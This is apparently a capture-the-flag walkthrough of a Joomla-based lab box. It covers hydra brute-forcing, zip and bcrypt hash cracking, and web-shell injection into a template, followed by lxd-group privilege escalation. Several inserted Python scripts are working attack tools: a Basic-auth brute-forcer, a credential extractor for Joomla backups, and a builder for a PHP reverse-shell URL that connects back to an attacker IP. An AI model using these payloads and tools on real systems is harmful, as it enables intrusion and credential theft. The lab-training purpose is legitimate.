HaJokerCTF

Target IP: 10.10.117.63


Scanning

The nmap scan shows three open TCP ports: SSH, an HTTP server on port 80, and a second HTTP application on port 8080.


Enumeration

Port 80: HTTP
Port 80 serves a Joker-themed landing page. Viewing the page source shows the different Joker quotes it displays.

A directory search with gobuster dir -u http://10.10.117.63 -w /usr/share/wordlists/dirb/big.txt -x php,html,txt turns up two interesting files: phpinfo.php and secret.txt. phpinfo.php discloses details about the host, such as the PHP version and its configuration.

secret.txt holds a short message that mentions two names, Batman and Joker. Those are candidate usernames to try against SSH and against the other HTTP application, if it has a login. I tried the directory search with other wordlists as well but found no further directories.

Port 8080: HTTP
The application on port 8080 requires a login before it shows anything. Fetching it with curl returns the authentication challenge rather than any page content.

Using hydra with hydra -l joker -P /usr/share/wordlists/rockyou.txt 10.10.117.63 -s 8080 http-get (the http-get module brute-forces HTTP Basic authentication, which is what this login is), I cracked the password for the user joker on the port 8080 application. The working credential is joker:hannah.
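What hydra's http-get module does under the hood, as an added example that is not part of the original writeup: each candidate password is sent as an HTTP Basic Authorization header and the guess is right when the 401 turns into a 200. The block below spins up a constructed stand-in for the port-8080 service on loopback (credential joker:hannah, a five-word wordlist in place of rockyou.txt) so it runs offline; brute_force works unchanged against a real URL.

```python
import base64
import http.server
import threading
import urllib.error
import urllib.request

# Constructed stand-in credential for the demo server (the page's target used joker:hannah).
DEMO_USER, DEMO_PASS = "joker", "hannah"
# Constructed five-entry wordlist standing in for rockyou.txt.
WORDLIST = ["123456", "password", "batman", "hannah", "joker"]


class BasicAuthHandler(http.server.BaseHTTPRequestHandler):
    """Minimal stand-in for the port-8080 site: HTTP Basic auth on every path."""

    def do_GET(self):
        expected = "Basic " + base64.b64encode(f"{DEMO_USER}:{DEMO_PASS}".encode()).decode()
        if self.headers.get("Authorization") == expected:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"welcome to the CMS\n")
        else:
            # This challenge header is what curl shows and what hydra's http-get targets.
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="Restricted"')
            self.end_headers()

    def log_message(self, *args):
        pass  # keep the demo output quiet


def start_server():
    """Bind the mock on an ephemeral loopback port and serve it from a daemon thread."""
    srv = http.server.HTTPServer(("127.0.0.1", 0), BasicAuthHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def try_login(url, user, password, timeout=5):
    """One guess: send user:password as a Basic credential; True only on HTTP 200."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req = urllib.request.Request(url, headers={"Authorization": "Basic " + token})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.getcode() == 200
    except urllib.error.HTTPError as err:
        if err.code == 401:
            return False
        # 403/429/5xx: a lockout or WAF, not a wrong password; stop instead of misreporting.
        raise


def brute_force(url, user, wordlist):
    """Walk the wordlist in order; return the first accepted password, or None."""
    for candidate in wordlist:
        if try_login(url, user, candidate):
            return candidate
    return None


if __name__ == "__main__":
    srv = start_server()
    target = f"http://127.0.0.1:{srv.server_port}/"
    print("joker:", brute_force(target, "joker", WORDLIST))  # hannah
    srv.shutdown()
```

Note that try_login deliberately re-raises anything other than a 401: a 403 or 429 halfway through rockyou.txt usually means a lockout or rate limit kicked in, and a tool that keeps going and reports "no password found" hides that.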

Logging in with joker:hannah gets me past the authentication, and the site behind it is a CMS.

Browsing to /robots.txt lists the paths the CMS asks crawlers to stay out of, which is a handy map of what is there.

/administrator stands out as the admin panel, but it needs its own username and password. Trying default credentials did not work either.

Running the directory search again, this time authenticated, reveals a file called backup.zip. I downloaded it to my machine, but the archive is password protected.

I extracted the archive hash with zip2john and ran john against it. The zip password is hannah, the same password the joker account uses.

Inside the backup is configuration.php, Joomla's main configuration file. It contains a username and password in plaintext, but these are the database credentials, not CMS logins, and they did not work for the admin panel. The file also reveals the name of the application's database: joomladb.

The backup also holds a database dump, joomladb.sql. Its users table contains a user called admin with the bcrypt password hash $2y$10$b43UqoH5UpXokj2y9e/8U.LD8T3jEQCuxG2oHzALoJaj9M5unOcbG. I copied the hash to my local machine.

Running john against the hash (format bcrypt, which the $2y$ prefix identifies) recovers the password abcd1234 for admin. That should be the login for the Joomla administrator panel.
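Pulling the credentials out of the backup can be scripted rather than eyeballed. The example below is added here and is not from the writeup; CONFIGURATION_PHP and JOOMLADB_SQL are constructed excerpts in the shape Joomla and mysqldump produce (the database password, the table prefix jos_ and the second user's hash are placeholders; the admin hash is the one from the dump). It parses the PHP config into a dict, walks the INSERT for the users table with a small tokenizer that understands MySQL's \' escapes, and emits user:hash lines ready for john --format=bcrypt (hashcat mode 3200).

```python
import re

# Constructed excerpt in the shape of Joomla's configuration.php. The DB password,
# secret and table prefix are placeholders, not values from the target.
CONFIGURATION_PHP = """<?php
class JConfig {
    public $sitename = 'HaJokerCTF';
    public $dbtype = 'mysqli';
    public $host = 'localhost';
    public $user = 'joomla';
    public $password = 'db-password-placeholder';
    public $db = 'joomladb';
    public $dbprefix = 'jos_';
    public $secret = 'secret-placeholder';
}
"""

# Constructed excerpt in the shape of a mysqldump of the users table. The admin hash is
# the one recovered from joomladb.sql; the second row is a placeholder with an escaped
# quote in the name to exercise the tokenizer.
JOOMLADB_SQL = """
CREATE TABLE `jos_users` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(400) NOT NULL DEFAULT '',
  `username` varchar(150) NOT NULL DEFAULT '',
  `email` varchar(100) NOT NULL DEFAULT '',
  `password` varchar(100) NOT NULL DEFAULT '',
  `block` tinyint(4) NOT NULL DEFAULT 0,
  `lastvisitDate` datetime DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB;
INSERT INTO `jos_users` VALUES (547,'Super User','admin','admin@example.com','$2y$10$b43UqoH5UpXokj2y9e/8U.LD8T3jEQCuxG2oHzALoJaj9M5unOcbG',0,'2021-03-01 10:00:00'),(548,'Harley Q\\'s account','harley','harley@example.com','$2y$10$placeholderplaceholderplaceholderplaceholderplaceho',1,NULL);
"""


def parse_config(php):
    """Return the `public $name = '...';` members of JConfig as a dict."""
    return dict(re.findall(r"public \$(\w+)\s*=\s*'((?:[^'\\]|\\.)*)';", php))


def parse_values(text):
    """Tokenise the (...),(...) tuples that follow VALUES; stops at the top-level ';'.
    Handles MySQL backslash escapes inside quoted strings and bare NULL/numbers."""
    rows, i = [], 0
    while i < len(text) and text[i] != ";":
        if text[i] != "(":
            i += 1
            continue
        row, i = [], i + 1
        while text[i] != ")":
            if text[i] == "'":
                j, buf = i + 1, []
                while text[j] != "'":
                    if text[j] == "\\":  # \' \\ \n etc: take the next char literally
                        j += 1
                    buf.append(text[j])
                    j += 1
                row.append("".join(buf))
                i = j + 1
            elif text[i] in ", ":
                i += 1
            else:
                j = i
                while text[j] not in ",)":
                    j += 1
                tok = text[i:j].strip()
                row.append(None if tok == "NULL" else tok)
                i = j
        rows.append(row)
        i += 1
    return rows


def table_rows(sql, table):
    """Rows of `table` as dicts, using the CREATE TABLE column order from the dump."""
    create = re.search(r"CREATE TABLE `%s` \((.*?)\n\)" % re.escape(table), sql, re.S)
    cols = re.findall(r"^\s*`(\w+)`", create.group(1), re.M)
    ins = re.search(r"INSERT INTO `%s`(?: \([^)]*\))? VALUES " % re.escape(table), sql)
    return [dict(zip(cols, row)) for row in parse_values(sql[ins.end():])]


def user_hashes(sql, prefix):
    """username -> password hash for the {prefix}users table."""
    return {r["username"]: r["password"] for r in table_rows(sql, prefix + "users")}


def john_lines(hashes):
    """user:hash lines for `john --format=bcrypt` (hashcat: -m 3200)."""
    return [f"{user}:{h}" for user, h in hashes.items()]


if __name__ == "__main__":
    cfg = parse_config(CONFIGURATION_PHP)
    print("database:", cfg["db"], "as", cfg["user"], "prefix:", cfg["dbprefix"])
    print("\n".join(john_lines(user_hashes(JOOMLADB_SQL, cfg["dbprefix"]))))
```

The table prefix comes from configuration.php rather than being hard-coded because Joomla randomises it per install; the same two files are also where to look for the database credentials that did not work on the admin panel.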


Exploitation

And boom! admin:abcd1234 gets me into the Joomla administrator panel. Time to upload a reverse shell!

Joomla's template manager lets an administrator edit template files directly in the browser. I opened the Protostar template and injected a simple web shell into its error.php, which takes the command to run from a cmd parameter.

The edit saved, and the web shell gives me RCE: browsing to http://10.10.117.63:8080/templates/protostar/error.php with a cmd parameter executes the command on the server. Time to upgrade this to a full reverse shell.

Running the PHP payload below through the web shell, with a listener waiting on my machine, gives me a full reverse shell on port 8443. Time to escalate privileges to root!

PHP payload used (URL-encoded, as sent in the cmd parameter): php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27
Decoded: php -r '$sock=fsockopen("10.14.55.153",8443);shell_exec("/bin/bash <&3 >&3 2>&3");'
Full URL with payload: http://10.10.117.63:8080/templates/protostar/error.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27

fsockopen connects back to 10.14.55.153:8443 and, in a fresh php -r process where descriptors 0, 1 and 2 are the standard streams, that socket normally becomes descriptor 3, so bash is launched with its stdin, stdout and stderr all redirected to the socket. The payload has to be URL-encoded because it contains &, < and > as well as quotes; an unencoded & would be read as the start of another query parameter and the command would be cut off.
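Building the encoded URL by hand is error-prone, so here is example code, added for this page and not from the writeup, that produces the same reverse-shell one-liner and the same encoded URL with urllib.parse.quote. It also decodes a cmd parameter back out of a URL, which is the direction a defender reading access logs needs. The shell path and the attacker address are the ones from the writeup; run() is the only function that touches the network and is not exercised offline.

```python
import urllib.parse
import urllib.request


def php_reverse_shell(lhost, lport):
    """PHP CLI one-liner: fsockopen() connects back to the listener and, in a fresh
    php -r process where 0/1/2 are the std streams, the new socket is normally fd 3,
    so bash is started with stdin, stdout and stderr all redirected to that socket."""
    return (
        f"php -r '$sock=fsockopen(\"{lhost}\",{lport});"
        f"shell_exec(\"/bin/bash <&3 >&3 2>&3\");'"
    )


def webshell_url(base, cmd):
    """Build the GET URL for a ?cmd= web shell.

    safe='' makes quote() encode '/' as well, so the result matches what a browser
    or curl --data-urlencode sends. Without encoding, the '&' in '<&3' would start a
    second query parameter and the command would be truncated at that point."""
    return f"{base}?cmd={urllib.parse.quote(cmd, safe='')}"


def decode_cmd(url):
    """Recover the command from a web-shell URL (e.g. one lifted from an access log)."""
    query = urllib.parse.urlsplit(url).query
    return urllib.parse.parse_qs(query).get("cmd", [""])[0]


def run(base, cmd, timeout=10):
    """Execute cmd through the web shell and return the raw response body.

    This is the only function that talks to the network; it is not exercised here."""
    with urllib.request.urlopen(webshell_url(base, cmd), timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    # Path of the injected error.php and the attacker address from the writeup.
    shell = "http://10.10.117.63:8080/templates/protostar/error.php"
    print(webshell_url(shell, php_reverse_shell("10.14.55.153", 8443)))
```

Start the listener (for example nc -lvnp 8443) before requesting the URL; the PHP process blocks on fsockopen until the connection is accepted or times out.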


Privilege Escalation

What? www-data is a member of the lxd group? That is enough to get root: members of lxd can talk to the LXD daemon's socket, and anyone who can do that can start a privileged container with the host's filesystem mounted inside it.

I downloaded alpine-v3.13-x86_64-20210218_0139.tar.gz on my machine, transferred it to the target, imported it into LXD, and launched a privileged container with the host's root filesystem mounted at /mnt/root. A shell inside that container is effectively root on the host.


Flags

The final flag is final.txt, sitting under the host root filesystem mounted at /mnt/root, so from inside the container its path is /mnt/root/root/final.txt. GG.